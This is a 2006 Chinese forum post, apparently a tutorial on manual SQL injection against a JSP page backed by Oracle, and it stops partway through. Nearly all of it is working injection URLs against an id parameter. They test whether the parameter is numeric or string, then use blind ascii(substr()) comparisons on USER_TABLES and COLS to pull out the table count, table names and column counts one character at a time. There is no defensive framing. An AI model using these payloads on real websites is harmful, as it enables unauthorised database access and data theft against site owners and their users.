服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2006-5-18 21:43:33

手工注射JSP学习

<DIV class=ContentFont id=NewaspContentLabel style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"><FONT id=font_word style="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif">
<P>1、 判断注入类型(数字型还是字符型)<BR>字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And user&gt;char(0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And user&lt;char(0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117' And user&gt;char(0) And '1'='1<BR>http://www.test.net/index_kaoyan_view.jsp?id=117' And user&lt;char(0) And '1'='1<BR>http://www.test.net/index_kaoyan_view.jsp?id=117' And user&gt;char(0) And '%25'='<BR>http://www.test.net/index_kaoyan_view.jsp?id=117' And user&lt;char(0) And '%25'='<BR>http://www.test.net/index_kaoyan_view.jsp?id=117) And user&gt;char(0) And 1 in(1<BR>http://www.test.net/index_kaoyan_view.jsp?id=117) And user&lt;char(0) And 1 in(1<BR>http://www.test.net/index_kaoyan_view.jsp?id=117') And user&gt;char(0) And (' ')=('<BR>http://www.test.net/index_kaoyan_view.jsp?id=117') And user&lt;char(0) And (' ')=('<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)&gt;str(97)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)&lt;str(97)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)&gt;str(97) And '1'='1<BR>http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)&lt;str(97) And '1'='1</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)&gt;str(97) And '%25'='</P>
<P> 
<P>http://www.test.net/index_kaoyan_view.jsp?id=117' And user&lt;char(0) And '%25'=<BR>http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)&lt;str(97) And '%25'='</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)&gt;str(97) And 1 in(1<BR>http://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)&lt;str(97) And 1 in(1<BR>http://www.test.net/index_kaoyan_view.jsp?id=117') And str(98)&gt;str(97) And (' ')=('<BR>http://www.test.net/index_kaoyan_view.jsp?id=117') And str(98)&lt;str(97) And (' ')=('</P>
<P>出现正常的页面:<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And USER&gt;CHR(0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And USER&lt;CHR(0)</P>
<P>2、 猜解表数量和表名</P>
<P>数据库数量为3:<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 2&lt;=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 4&gt;=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And UNISTR(1)&gt;UNISTR(0)</P>
<P>以下为猜解数据表数量<BR>数据表第一位为:1</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))</P>
<P><BR>数据表第二位为:3<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 77&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 70&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 67&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 109&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 102&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 99&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 97&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 53&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))</P>
<P>数据表第三位为:1<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 77&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 70&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 67&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 109&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 102&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 102&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 99&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 97&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 54&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52&gt;ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))</P>
<P>共有131个数据表,见上图。</P>
<P>以下为猜解表名称:<BR>以下为判断第一个表的长度为:2<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 2&lt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 2&lt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 4&gt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 3&gt;nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P><BR>以下为判断第一个表的第一位值为:A<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),1,1))</P>
<P>以下为判断第一个表AD的第二位值为:D<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 78&gt;ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 71&gt;ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=1)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P><BR>以下为判断第二个表的表ADER的表名长度为:4<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 2&lt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 4&gt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 3&gt;nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>以下为判断第二个表ADER第一位的值为:A<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),1,1))</P>
<P>以下为判断第二个表ADER第二位的值为:D<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 78&gt;ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 71&gt;ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P>以下为判断第二个表ADER第三位的值为:E<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 79&gt;ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 73&gt;ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 73&gt;ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 70&gt;ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),3,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),3,1))</P>
<P>以下为判断第二个表ADER第四位的值为:R<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),4,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),4,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),4,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 80&gt;ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),4,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 80&gt;ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),4,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),4,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 85&gt;ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),4,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=2)ORDER BY 1DESC)WHERE ROWNUM&lt;=1),4,1))</P>
<P>以下为判断第三个表的表名长度为:<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=3)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=3)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 2&lt;=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM&lt;=3)ORDER BY 1DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>3、 猜解列名长度和列名:<BR>a) 以下为猜解字段长度为:2位<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 2&lt;=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 4&gt;=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 3&gt;nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)</P>
<P><BR> 列名长度为:10位以上<BR>以下猜解列名的长度的第一位为:1(十位)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))</P>
